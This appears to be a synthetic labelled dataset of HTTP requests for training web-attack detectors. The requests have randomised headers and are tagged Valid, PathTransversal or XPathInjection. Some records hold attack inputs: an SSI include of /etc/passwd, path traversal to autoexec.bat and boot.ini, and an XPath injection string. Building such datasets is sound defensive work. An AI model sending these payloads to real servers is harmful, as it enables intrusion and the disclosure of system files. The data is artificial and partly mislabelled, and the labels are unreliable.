POST /ezl.xJUt.hwHMrx.rc8/S6rOSLGBZvautoexec/lZ_.cK/iCmqAE6P8vLiF2.XTTW/06eF@aW7wF-HG/dbe3Hns1ut/nZtVWYkdVv/sluwpespttbni.html? HTTP/1.1
Content-Length: 77
Content-Language: edeethee,ih,dtnaqox
Content-Encoding: compress
Content-Location: /edye5t5e/hVeue.shtml
Content-MD5: dGVlc2lvdG50ZUFlYWVkdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Dec 08 13:41:11 CET
Last-Modified: Tue, 11 Oct 05 21:24:02 GMT
Host: www.fdttsagn8.com
Connection: otdsi
Accept: video/*;q=0.5, audio/*;q=0.0, image/*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: compress, compress, compress
Accept-Language: *
Cache-Control: max-stale
Client-ip: 222.71.177.248
Cookie: s94laigau0LerNn=aaea;@v5objectMOtqF=ukvoLW;ilelsoo7ea7d=lF076zVq-xuv;f-2Lz=fui8tdnutsbgsound;swrhaZaHOeiaotq=682
Cookie2: $Version="24"
Date: Thu, 11 Feb 10 24:25:13 CET
ETag: W/"wessjOMa7HtfyrLv7"
Expect: 100-continue
From: aweeee@nAyt.uk
If-Modified-Since: Fri, 23 May 08 10:55:02 GMT
If-Unmodified-Since: Mon, 28 Jul 08 11:13:49 GMT
If-Match: *
If-None-Match: "euxEby7u13viOEm-J"
If-Range: Fri, 26 Jan 07 08:21:10 UTC
Max-Forwards: 76
MIME-Version: 8.5
Pragma: thl4hHrr='i'
Proxy-Authorization: Basic ZXRpYWFVOnNhc2NwbnA=
Authorization: NTLM THR0d2RlZWlscW5yYXRodDF0MGRpd3hhaXN0ZmhzUHN0ZGo1b3dhaG5hc2k=
Range: 54-,-069294,81-
Referer: /r4rspa.mp3
TE: trailers,chunked;q=0.2,deflate
Trailer: Pragma
User-Agent: lLpx7QCC@f http://www.yo6tosah.uk
UA-Disp: 9131,8742,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 645x141
Via: 9.8 www.hreh.js, 6.1 www.ia3nil.tiff
Transfer-Encoding: gzip
Upgrade: nqe/4.6, tcf/9.3, s1a3ie/5.1, pcoE/9.0, Ier1/7.4
Warning: 160 24.22.169.229 "rronaouo9om9e1h5" "Mon, 07 Feb 05 22:47:07 GMT"
X-Forwarded-For: 36.239.161.183
X-Serial-Number: 7950474453739700165
----: ------------------------------
~~~~~: ~~~~~~~~~~

Lugp=<!--  #include virtual="/etc/passwd" -->&9mHT=+rhhea

End - Id: 39570
Start - Id: 34161
class: Valid
POST /e1bC4zQ-l-n2RWCN.jpg? HTTP/1.1
Content-Length: 20
Content-Language: xA,nhra,oismokao
Content-Encoding: compress
Content-Location: /1Iewfist/IaatU/eLee14a/rshq/qom1N.php3
Content-MD5: b2Flc2lrdHR0dGJCeVRzcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Nov 07 11:43:50 CET
Last-Modified: Tue, 02 May 06 23:39:16 UTC
Host: 227.227.233.193
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: koi8-r, windows-1250;q=0.9, utf-7, iso-8859-3
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 229.106.129.24
Cookie: a2dasrelQlsot=u;irhtalenmonsen=otIez;hfr6im=47665833;Toeoaot=5076915994
Cookie2: $Version="0"
Date: Sat, 17 Nov 07 15:24:39 CET
ETag: "W6RIxcRFJaUsrHepwgOU"
Expect: 100-continue
From: ol8k@oiren.st
If-Modified-Since: Tue, 29 Mar 05 20:05:11 CET
If-Unmodified-Since: Sat, 11 Nov 06 22:24:56 CET
If-Match: *
If-None-Match: "icP@LPITUg@y_LQeq-JY"
If-Range: *
Max-Forwards: 1112
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: sahe tsshe=ajtnobe
Authorization: Digest username="srua"
Range: 713-,7885-54
Referer: /1eedC2s/owot.gif
TE: gzip;q=0.5,trailers
Trailer: Connection
User-Agent: Mozilla/7.8 (X11; U; SunOS sun4u 8.3; tn-eH; rv:0.9.3) Gecko/42137184
UA-CPU: x86
UA-Disp: 892,7658,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 995x590
Via: 6.4 www.ifmonntr.css
Transfer-Encoding: deflate
Upgrade: r9e3sj/2.9, ssde/1.5, 28o5l/1.1, cra/1.9, oir/5.1
Warning: 761 204.87.63.171 "4sa9bahilwl" 
X-Forwarded-For: 148.127.25.65
X-Serial-Number: 8391965
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~

tjzoptwaidLtt=093533

End - Id: 34161
Start - Id: 29975
class: Valid
GET /tEesshe2raor/iMst3TX4R-UGcy1oq@q/dn/hT15Tm0In/-cRu850l/rruIRoteFii/sxh7f3Hdiwttrnla2.exe? HTTP/1.1
Host: 117.111.127.22
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.0, deflate, deflate, compress, identity
Accept-Language: *
Cache-Control: 8=ntrd
Client-ip: 26.168.29.0
Cookie: lorce=nTUoQJx7W@;etfos9=u2O-IaD4;kon9eeoyekfts=3nnealie6yu
Cookie2: $Version="91"
Date: Wed, 13 Apr 05 09:52:03 CET
ETag: W/"BCAaQ9DC714X.vp2pblZ"
Expect: eeenmd
From: nAen2Ew@Xo7tyav4o.biz
If-Modified-Since: Sun, 21 Jan 07 08:37:29 UTC
If-Unmodified-Since: Thu, 24 Jul 08 06:25:56 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 09 Apr 10 01:20:23 GMT
Max-Forwards: 35
MIME-Version: 0.1
Pragma: petaevi='al'
Proxy-Authorization: rrrf natgEri=u7aTNgi8
Authorization: NTLM ZmhyU3R6T3RyZzZpcGxodFRtMWVoaGJndHBvc29vY2d1aWEwaDc=
Range: 89712-
Referer: /ehjex/wMesdret/thtaoo7o/5erma3n.wmn
TE: deflate,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.7 (X11; U; SunOS sun4u 4.2; en-st; rv:4.7.8) Gecko/76961298
UA-CPU: 68000
UA-Disp: 644,8528,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 453x832
Via: iqi/8.1 www.gtzm6s.tiff
Transfer-Encoding: compress
Upgrade: eds/9.2, isa/3.3, kej/9.4
Warning: 929 111.138.94.34 "fYos2dhjediq09q9ela" "Sun, 20 Sep 09 07:36:42 GMT"
X-Forwarded-For: 80.188.232.109
X-Serial-Number: 2857393
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29975
Start - Id: 36186
class: PathTransversal
PUT /kx0eWWMFreplace/Ei15e/il/nyNRlJUfzA/iYFsmexecoRFf/likepU-rmupasswdg/6aRPjiIE/s@lSG-AxcopyaKL3/aFOsN9rZaBu9.jpeg? HTTP/1.1
Content-Length: 28
Content-Language: r,slnw5cEa
Content-Encoding: gzip
Content-Location: http://www.mtnd7.ch/honlYv/c92hae/yctr/eSwv/0j98n.css
Content-MD5: aTNlMXI3bWxpbWUybDJhNQ==
Content-Type: application/x-www-form-urlencoded
Host: 200.92.16.239
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: windows-1257;q=0.7, windows-1252
Accept-Encoding: compress;q=0.8, gzip;q=0.3
Accept-Language: t-vh8rt, Eti-0yyemvMk, so-sjeee, oyce66-hmuio41;q=0.4, tissyBb-SwunYre;q=0.7
Cache-Control: no-transform
Client-ip: 220.235.100.136
Cookie: noin6ohyi2=asTqi;sn=aeesuiwr1nsfo;kpq2=hi;VN4Joptc3U=BiresrdeIwttot;eedO=7319
Date: Sun, 23 Nov 08 04:55:49 GMT
Expect: nthoiP=wlyg9hri
From: 5uhy@ih5iar.uk
If-Modified-Since: Sat, 01 Mar 08 16:10:54 UTC
If-Unmodified-Since: Wed, 27 Feb 08 15:47:30 CET
If-Match: "ACNuRQA@pgCWemcm"
If-None-Match: *
Max-Forwards: 758
MIME-Version: 2.6
Pragma: Oam=37s
Authorization: fs3mas yynattw=lroh
Referer: /7Sat/dfti/tdOpar/at4nesr.php3
Trailer: If-Unmodified-Since
User-Agent: ../../../WINNT/autoexec.bat
Via: ia1ee/1.5 www.8sbag.shtml:59171
Transfer-Encoding: identity

oors6c=s~p%]itmochae9s

End - Id: 36186
Start - Id: 16979
class: Valid
GET /heUnOeg.sh?1B2ezfcame=70496870&er=rfsPloehe&es52ooienis0ea=oedrR+e%27sl&ieu8aejnnp7vhan=%7C&poha=1childtgroup+by&1GHWUr.dwhw=at3rnceO&si19giauqrrvivn=rGbo&sEsctfcN6=%2Be&eovsop=entmp3rqlsjneaagroup+bydur&1trn3yriai=heranntahh6&tjxcaesrdsc5=Wpsysozi HTTP/1.0
Host: 153.54.60.93:80
Connection: keep-alive
Accept: image/*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: rths5l='essat'
Client-ip: 116.211.220.134
Cookie: nThorptnnDtat=and6;pfre6elldc= cgnEkriyasseg;JGopt.@xyN0=ncu;dobsihMarEid=phsr;y;qy;vLBcmailzVpsYumI=lqem stdinhtacceseifgamz+eb1oe;hmcstf=2829441
Cookie2: $Version="398"
Date: Thu, 16 Mar 06 17:34:29 CET
ETag: "L3sTip.hI8HQ1AYfMBWA"
Expect: 100-continue
From: tilh7o8@rkyx6lf.net
If-Modified-Since: Fri, 08 Apr 05 15:57:17 GMT
If-Unmodified-Since: Mon, 16 Jan 06 20:32:18 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 18 Jan 10 18:01:35 CET
Max-Forwards: 5512
MIME-Version: 9.9
Pragma: nae6tt='ks'
Proxy-Authorization: Basic ZWVvaXNSbDplbG9kV2VhdA==
Authorization: Digest nc=1596bdD5
Range: 17583-
Referer: /aAgo.css
TE: trailers
Trailer: Date
User-Agent: daa6nhad/8.4.1.5.2
UA-CPU: 68000
UA-Disp: 287,215,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 366x7717
Via: HTTP/4.6 101.104.181.247, 9.5 www.Ltso.gif, tnbzi/1.8 www.Ermo.js
Transfer-Encoding: deflate
Upgrade: Tt2oaj/5.0, oi4aqT/2.5
Warning: 236 www.kteDei.png "aaNzovzy59eaipao" 
X-Forwarded-For: 74.191.166.32
X-Serial-Number: 44944819
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 16979
Start - Id: 25572
class: Valid
GET /snilnqrsge/EDHeinLIjtKExq_-/oOo/e7lB6XWMlqyhxk0zf4gn/ofDlNbq/0Sfpasswd3Xv/roste4b/aRndOiZGSzXgJJV/i.L5c-/iFRxR9.js?ltlyG=script&hmiS0moifs=len&eez=zo+&Eiei6tt=neaurswt1aetclibiaa&lrneotnsyd=2727382&TvH=E+&T98COf3=i%29&T5u.@UyA=7643&go=asncl&iAw=oannr&uo=%2Bss4sconnectBhTgIas1a&778andlO=67&TmRvV=%28p+Nn&Etttsoj80=i50nrcycuEe5taa&iolgiiieenor=3661021337 HTTP/1.1
Host: www.Tebosdet.com
Connection: close
Accept: text/*;q=0.5, audio/x-wav;q=0.0
Accept-Charset: x-mac-turkish, x-mac-roman;q=0.6
Accept-Encoding: *
Accept-Language: sbery2-ouddc, prlkr4t-qf, dwtdeRnp-e;q=0.1, t5-t;q=0.4
Cache-Control: no-cache
Client-ip: 212.28.47.131
Cookie: vnn8hrriGee=2w.a;ekrua=8021234;QgkhwfnnlSc=o6Adwindow.open;nO=Wiu(;c7Ht4arO4zoani=Eh 5ng iewti\eoru7l
Cookie2: $Version="776"
Date: Sat, 09 Jul 05 13:38:17 CET
ETag: "6@wpY@RCVf5r4r-SR5@H"
Expect: 100-continue
From: 1f6Ni@rt9a.gov
If-Modified-Since: Sun, 10 Jul 05 22:42:35 GMT
If-Unmodified-Since: Thu, 03 Sep 09 09:19:09 GMT
If-Match: *
If-None-Match: *
If-Range: "3ZFotXQtH0PZ_eg8cs9R"
Max-Forwards: 76
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM cm9lVm13NTZlNGlnQXRoaW9lbWF0bmw5Z2VlZmhuZTRUOG9O
Authorization: Digest cnonce="tometHt"
Range: 671178-,418-,636493-
Referer: /6hKef/teioeur.asp
TE: trailers,chunked
Trailer: If-Modified-Since
User-Agent: cp-EiZG http://www.ezenHot.cz
UA-CPU: Sparc
UA-Disp: 242,0728,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 437x001
Via: 9.1 94.132.241.231, 1.7 200.209.153.213:48, Octd/0.5 www.oi0N.shtml
Transfer-Encoding: deflate
Upgrade: rItnM/0.1, bueqhz/8.3
Warning: 097 www.tran65.gif "Irr7iaIntlaOgsleocpl" "Tue, 01 Jul 08 11:26:06 GMT"
X-Forwarded-For: 255.93.182.143
X-Serial-Number: 644521
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25572
Start - Id: 4449
class: Valid
POST /iAerp/sG67/Apasswdmailp.5Nzb/HaiotA7E8ee/rttsz5neyaoen/AsGnwhiesacspnstenh.tiff? HTTP/1.1
Content-Length: 70
Content-Language: 2Sc4SEtp,sr
Content-Encoding: compress
Content-Location: /hxsnz/iaEA/utTsahTl/HsSi.swf
Content-MD5: Y2dObHNtMnJ0YXdkb1NoaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 02 Nov 06 04:14:45 CET
Last-Modified: Fri, 08 Feb 08 11:16:53 CET
Host: www.iIest.com
Connection: qAon
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: puahhetu-kad, tT-thtjasr;q=0.6, h-r;q=0.5, Wpsd6-ettegn, EnRjGea-ht;q=0.4
Cache-Control: max-age=46
Client-ip: 158.211.9.8
Cookie: ioiosm=nWx;vaf=heuree;Hnbn=275966523
Cookie2: $Version="774"
Date: Mon, 10 Apr 06 20:45:48 GMT
ETag: W/"GJZ0QwxfnKVrWTPAX_Q"
Expect: W9u3Rr=oeoit;Rrcabono=tnhrcw
From: onresk@onoddtq.be
If-Modified-Since: Thu, 13 Dec 07 21:55:55 CET
If-Unmodified-Since: Fri, 29 Dec 06 17:52:36 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Sep 08 24:03:28 UTC
Max-Forwards: 62
MIME-Version: 2.9
Pragma: e1gxqa='heqi'
Proxy-Authorization: NTLM c2F0ZWVoOGRQckVvdWVvNWxlb2hvczY2amdlcm9uczI=
Authorization: 0P6b8 tsyf=esro
Range: 64421-813,254899-
Referer: http://www.hissom.net/iraxc1ez.tar.gz
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/0.6 (Windows; U; Windows NT 2.2; fi-eh; rv:0.2.7) Gecko/61512111
UA-CPU: StrongARM
UA-Disp: 5974,926,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 604x596
Via: 3.0 www.sqnys.tiff:40
Transfer-Encoding: eenvm1
Upgrade: caueo/3.4, rif/5.0
Warning: 774 98.7.54.149 "snI8ejlpssn" "Tue, 19 Apr 05 06:05:00 CET"
X-Forwarded-For: 9.134.134.209
X-Serial-Number: 053208446
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

ii7soncfouh=d4Tsngsp&aid=rtTneiet7hyefsa&ni3mrictc5tdDn=enoioOtmAtsnth

End - Id: 4449
Start - Id: 27644
class: Valid
GET /FKformosqkx/ran/udhVettrnaumli/PN9.betweenbt/esae/0LWKEdH869EGPgT/3aOOO8Br6O/eNedutNamR/kcdirtgwiias/e2j9bakDiEC6srYMuwZe/niese.asp? HTTP/1.1
Host: www.ssmnsekrhs.be
Connection: aajshco
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 249.193.66.99
Cookie: 2spogp9soae=duRlir;yoeOmn=70316;ntzBD=nN ;hteaeEerre==isunionH;dt9=960476;mhe=3852745
Cookie2: $Version="8"
Date: Fri, 08 Aug 08 12:33:51 GMT
ETag: W/"T9b_xrRlQDObCiFo9Y"
Expect: 100-continue
From: Rofmod@oeornsCta.de
If-Modified-Since: Sun, 29 Apr 07 05:10:38 CET
If-Unmodified-Since: Sat, 01 Nov 08 07:24:18 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 42
MIME-Version: 0.1
Pragma: a='o3iE'
Proxy-Authorization: Basic TmVyRXQ6ejdUOQ==
Authorization: Basic Yk5ubXVydHI6b3Rvcg==
Range: -88
Referer: /Yqnphff/tnux/hmgt.jpg
TE: chunked;q=0.8,chunked
Trailer: Via
User-Agent: gjv2yTQD http://www.tcEvdrae.net
UA-CPU: x86
UA-Disp: 368,095,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0807x3166
Via: HTTP/2.8 www.t15yu.jpg:340, HTTP/1.8 139.227.215.56, 0.2 237.89.34.221
Transfer-Encoding: cnedw
Upgrade: n5eeiS/7.2
Warning: 259 www.rfDsn.jpg "ohSzyAnhwspipbdtmo" "Tue, 28 Jun 05 14:35:35 GMT"
X-Forwarded-For: 21.17.8.118
X-Serial-Number: 189697977036477
----: ----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27644
Start - Id: 18397
class: Valid
GET /n@eup1yrfF0A3o9A/ilBngh1/rM6AdyFETd@6tondwh/9betweenl5O95/9naufntteLasicMen/osyruetcssexssst/swOlOa7nntau4k/iexecOaiSwx0dakBej.css?etsdckrocfauidn=aame2rt5dy8eaitLk&74imtBeiiEe=l6&Itnve1rh8rms=43046&vsezu9eE=nngl%3Fb&enteessf4yueheo=722068&yIeEr7srt=s1DQVpS93IW&ejei2ehlef=vsdyidouofieNstH&CpI8y41rm=363&asdiTstf=N7o%7Eci9lSlctmynh&thtamitIeenb6i=aon&clm=s4%2Btinsert1a HTTP/1.1
Host: www.orgae.be
Connection: close
Accept: */*
Accept-Charset: macintosh, x-mac-chinesesimp;q=0.8
Accept-Encoding: gzip
Accept-Language: *;q=0.9
Cache-Control: max-stale=64946
Client-ip: 211.125.110.38
Cookie: uB=7;9efuiltn=985224;ernmloivoeiE=frome;neewy=afbXJs
Cookie2: $Version="8"
Date: Sat, 24 Apr 04 13:51:49 GMT
ETag: "HNVOGLy95aTz8onHZ2"
Expect: vempI=nenndkSg;4fNthXo
From: 1hniea@u4rmt.it
If-Modified-Since: Fri, 11 Sep 09 21:35:50 GMT
If-Unmodified-Since: Sat, 18 Jun 05 04:49:49 CET
If-Match: *
If-None-Match: "SP87Gznvb@2adGZ@k"
If-Range: Fri, 28 Nov 08 10:10:20 GMT
Max-Forwards: 2584
MIME-Version: 9.8
Pragma: hvCunt8=9btdt
Proxy-Authorization: Digest opaque="sroo"
Authorization: Basic bGF0dDppZWJubw==
Range: 4556-,-763,39926-874
Referer: /y4ss/eseh1on.nsf
TE: trailers,chunked;q=0.9
Trailer: Cache-Control
User-Agent: Mozilla/2.2 (Machintosh; U; PPC 7.2; la-ol; rv:5.4.7) Gecko/09306424
UA-CPU: x86
UA-Disp: 1149,2430,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 705x273
Via: 8.7 www.netes.jpg, HTTP/0.0 90.185.188.152
Transfer-Encoding: deflate
Upgrade: pto1de/0.8, qne/9.3, atwl/8.8
Warning: 233 131.132.144.191 "OnEdmsatmalecc2jI" "Sat, 10 Jun 06 22:22:26 UTC"
X-Forwarded-For: 185.28.190.254
X-Serial-Number: 9325860267416944126
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18397
Start - Id: 23693
class: Valid
GET /z7/QaaEel5umichnc0d/awaasmc0C3HCpxd-S_h6/7txBElpEH@2/aar2srmceemnsnolpyss/anea3t7Dneigrpi/9m6SwnodeAaQ9/eeioutessci6itLeR/UscriptfvIfechoPPlibposition/dEGAlHyGWgEU8/eoW62.7T.1U.htm?srgnter=eTac&98wxtermb9zxmljv2=+lo%3A+p4s&siest3d7ha1r=iun0&rurpyLkiVritnit=Imre&eXlhlsablab=%28%5C&4oh2=53&itiutod=jooaosda5rciedrop+&tnn=244&rt4=866756&3e3Adotbugt=l7soccedi%40%24&uett8qfeguStind=ar&aa=a&7KV9C7z=tcmdN HTTP/1.0
Host: 200.55.112.135
Connection: keep-alive
Accept: audio/x-wav, video/quicktime
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: rato=inifuwi
Client-ip: 103.148.150.147
Cookie: uast=dmsne;spbh9q7=yC_QAX;ussy=mtrh88exec
Cookie2: $Version="7"
Date: Wed, 07 Apr 04 21:58:34 UTC
ETag: "nT-GYRxbdWwsHud3"
Expect: 100-continue
From: lanon@fBeece5si.gov
If-Modified-Since: Sun, 12 Dec 04 06:27:21 UTC
If-Unmodified-Since: Thu, 31 Dec 09 03:28:28 GMT
If-Match: "i@zLMR9K_lnqy_VrD"
If-None-Match: "NuBlchVKBtOEFSw"
If-Range: "hBnfKna0Hp32Esw14"
Max-Forwards: 3
MIME-Version: 4.4
Pragma: dSnsund=o
Proxy-Authorization: eaweh z0t6U6=ndaum
Authorization: Basic b24yN3RGOnhVZW8=
Range: 5716-
Referer: http://alutwve.st/ag5ghou/aiPTel/ofshtN/moeaye.js
TE: gzip,trailers
Trailer: Max-Forwards
User-Agent: eje9g (awR82Zin)
UA-CPU: MIPS
UA-Disp: 188,809,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3131x3591
Via: 6.8 123.180.144.134, FTP/1.7 204.72.200.21, 2.5 www.qtwts.jpg
Transfer-Encoding: deflate
Upgrade: 1ataa8/2.4, tfcco/9.9, ntpeI/3.5, Kng5/3.3, ii3/6.1
Warning: 856 71.214.87.68 "aesKobNh8beti" 
X-Forwarded-For: 221.201.74.91
X-Serial-Number: 13224
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 23693
Start - Id: 44673
class: PathTransversal
GET /im6asAcfgataeudien/Leix7/mvotrtm0uxawe0ec/oaos7ys28nayefl0yne/etB5BPhrlmFXIaBo9hv/sde3bifqo.php?yvJ3k=oh.vL-l&arfzlmr=%25Hexw%3Fwe&7h=andTaunion2apmio%7E&FEW_fdHNxG2M=trkea%3Aa&5NM8TXmNzF=9hoiaiird&7an05ihs=ehonalogpt&i6=0885753212&29tnlE1Hbi=m1HZc&insertUMI5M_id@a=cnaa&fro5hiltsotrfu=%7Cyb&rfalt=55802 HTTP/1.0
Host: www.atodsx.it
Connection: close
Accept: application/*;q=0.2, audio/x-wav, text/xml
Accept-Charset: x-mac-icelandic, ks_c_5601-1987, iso-8859-1
Accept-Encoding: deflate;q=0.2, identity, gzip, deflate;q=0.7
Accept-Language: *
Cache-Control: only-if-cached
Cookie: usDb5Hl=file:///i:/qr/1dn/aodbe.xml;8aliueihaebneqs=cuadg;pz6nbpMai=inNldbinems;6i=55339
Date: Sat, 11 Aug 07 13:22:53 GMT
If-None-Match: *
Max-Forwards: 113
Pragma: lTya5o1='p'
Referer: http://www.eh2fu.st/oFB8jnol/eott.exe
TE: trailers,trailers
User-Agent: Mozilla/5.6 (Windows; U; WinNT 6.9; an-no; rv:8.5.1) Gecko/95277779
UA-Color: color8
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44673
Start - Id: 35805
class: XPathInjection
GET /eoIp/tjWpptLpQCMcy/ii3oereuempG/aw95tInQt3/h_TX/t5E/e8gUQ7/nabythespgdedqp/JEOwWQ7W7b.htm?ZO5y7Up=eniat%3Dmna%5B2o4phpngee&wrds1ak=ewr0%27++or++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or+%276orbe0E%27+%3D+++%27&siillne=pD2n.VT&nihi=tKxQ3CsF5BW4 HTTP/1.1
Host: 247.235.39.54
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, compress;q=0.8, gzip, deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 25.4.155.47
Cookie: Kx5qtelnetHGD=dnte
Cookie2: $Version="52"
Date: Fri, 20 Feb 04 10:01:48 CET
ETag: "LurqXpLgf.Ql2zH"
Expect: lteNH=ieiARts;setA=dgrtRD
From: gH0ez@Sireoah.fr
If-Modified-Since: Wed, 21 May 08 07:23:05 UTC
If-Unmodified-Since: Mon, 30 Aug 04 10:26:00 CET
If-Match: "lMuwsZvm4g4Xtf9"
If-None-Match: *
If-Range: Tue, 18 Jul 06 02:30:01 UTC
Max-Forwards: 7
MIME-Version: 0.7
Pragma: txP=lostFv
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest opaque="rt7ngt"
Range: 205-0247
Referer: /ttRaoct/aaeoeso.php4
TE: gzip,deflate,trailers
Trailer: Cache-Control
User-Agent: oTJyPJ http://www.rpqejren.biz
UA-CPU: x86
UA-Disp: 861,959,8
UA-OS: WinNT
UA-Pixels: 4135x5853
Via: 0.7 97.3.176.16
Transfer-Encoding: gzip
Upgrade: hljiT/5.4, axrst/8.8
Warning: 463 52.135.104.34 "le3vso" 
X-Forwarded-For: 240.46.36.222
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35805
Start - Id: 6480
class: Valid
POST /0.zXsUdPOZhZtaDVixs/naiabetmsNlnmvcs/sewwwoucpoHDOoKe/rxXfLHl/ei7bw5onamaCicsnodgs/b9haghroFsZryp/higdx0wdR2ottpmse/1IS1NsPzhL8xf/nzU_Pxl/rlwsnciOd8uoieataN/0fHL0kKtnvPD-CGe/sv@fUp7vRExlM8Ia.mspx? HTTP/1.1
Content-Length: 229
Content-Language: z,udsiae,e
Content-Encoding: deflate
Content-Location: http://fsuhxtS.ch/dowzyxod/etflqtr/rrau9nTe/rbtdoR.exe
Content-MD5: VGVoaW01c29nYWVUdW5kag==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 07 Jul 05 13:03:46 GMT
Last-Modified: Wed, 24 Oct 07 03:45:32 CET
Host: 114.179.78.204
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: macintosh, isiri-3342, cp-932;q=0.9, x-mac-chinesesimp
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: min-fresh=0
Client-ip: 36.177.173.251
Cookie: tnnrhrp6nee=tOEmoneIea;FqsaEcNonRt=47136;rerdn=etee1d9EraUgatitxd;dEJbody5oeR_r=71569522;Es=3wzsa
Cookie2: $Version="84"
Date: Fri, 16 Apr 04 08:50:54 GMT
ETag: W/"Yd7ZqSMixN3Jy_dZevZ"
Expect: oniae
From: bt9tsB@settit.be
If-Modified-Since: Sat, 27 Nov 04 18:48:06 CET
If-Unmodified-Since: Tue, 19 Dec 06 01:52:20 CET
If-Match: "cZf9UQPVft11XIb-Tlxi"
If-None-Match: *
If-Range: "KTKaXDdp5tMLHt3OVao"
Max-Forwards: 097
MIME-Version: 3.4
Pragma: 0toroa=ostE
Proxy-Authorization: Digest cnonce="srqEeu"
Authorization: Digest realm
Range: 6635-
Referer: http://www.8hAua.org/eeksett/oS26so/tosisew/cuoacgbm.php
TE: gzip;q=0.7,trailers
Trailer: If-Unmodified-Since
User-Agent: Paosetcb (iYz5x-; 8ZNLx@Uts; eJ698f0m; y.zMQ@G)
UA-CPU: Sparc
UA-Disp: 0332,310,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7326x597
Via: 3.3 www.uurl2H.png, oblee/5.8 www.Mt7groa.shtml
Transfer-Encoding: gzip
Upgrade: ropcwa/9.2
Warning: 447 37.2.170.213 "8reqteinidDfS9tu7r6" "Mon, 13 Mar 06 18:40:21 UTC"
X-Forwarded-For: 25.241.101.9
X-Serial-Number: 833919639631798
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

1v=rdotIqo7ys4oair&Yj1AklaZDin_M=0&LBsock_streameYjmsh3=557&-node9scriptGfpVkS=823329&ooaiSfegseaI=izWKKG1KH.2N&6KvefdewerlEkt=2&l8gav=01&enN=eE3d&no8ws=wSvgG&jtivwf9a=btA4Hgcla&Oevalg@TwlhG1sN=rrzrN2p&ftbrretue=9248T&tsl8ti=deHD

End - Id: 6480
Start - Id: 45736
class: PathTransversal
GET /s6@hA/UhGqQxOm/an89/a3eAtxrGu.yZL-J9/37I5WzE2s2x.cjYn/cNQOgB.pSVk@YM.asmx?iovfyinceale=d%3A%5Cwinnt%5Cboot.ini HTTP/1.1
Host: www.onaeN.ch
Connection: close
Accept: */*
Accept-Charset: windows-1255;q=0.9, x-mac-korean, hz-gb-2312, iso-8859-4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=89998
Client-ip: 195.187.195.167
Cookie: trmhaen=cb
Cookie2: $Version="34"
Date: Sat, 22 Jan 05 21:50:02 UTC
ETag: W/"ZuZLKP3v5YD1lYXEqcG"
Expect: twlia9=reoe
From: id9Eem@Ce2rja.fr
If-Modified-Since: Tue, 29 Sep 09 11:46:58 GMT
If-Unmodified-Since: Tue, 13 Jun 06 15:50:44 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0776
MIME-Version: 7.5
Pragma: d='Yfiftr4'
Proxy-Authorization: swjmRp fzc3=EdDtese
Authorization: NTLM Y2hhb3VuY2FtZVR6Z3JjcXB0ZnJyb3Vtb3p1czhqbmVk
Range: -500252,934-3694
Referer: /feip.asp
TE: chunked,trailers
Trailer: Via
User-Agent: Mozilla/3.1 (compatible; c8ete; Linux i386; oewsteent; nj7o6cih5)
UA-CPU: Sparc
UA-Disp: 3522,615,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 979x8035
Via: HTTP/3.5 181.85.158.9:887, 5.6 www.2dao.htm
